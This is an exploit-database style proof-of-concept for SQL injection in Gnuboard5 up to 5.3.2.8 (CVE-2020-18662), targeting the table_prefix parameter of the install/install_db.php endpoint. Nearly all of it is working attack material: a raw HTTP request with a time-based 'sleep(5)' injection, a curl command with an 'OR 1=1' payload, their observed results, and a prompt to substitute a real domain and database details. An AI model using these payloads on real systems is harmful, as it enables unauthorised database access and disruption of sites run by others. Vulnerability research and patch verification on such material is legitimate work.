# Exploit Title: [Gnuboard5 <= 5.3.2.8 SQL Injection via table_prefix Parameter]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/gnuboard/gnuboard5]
# Software Link: [https://github.com/gnuboard/gnuboard5]
# Version: [5.3.2.8] 
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2020-18662]

PoC: 
1)
POST /install/install_db.php HTTP/1.1
Host: gnuboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)#
result: sleep 5s.
2)
curl -X POST http://gnuboard/install/install_db.php \
  -d "mysql_user=root" \
  -d "mysql_pass=password" \
  -d "mysql_db=gnuboard_db" \
  -d "table_prefix=' OR 1=1--"
result: The application does not work.

[Replace Your Domain Name and Replace Database Information]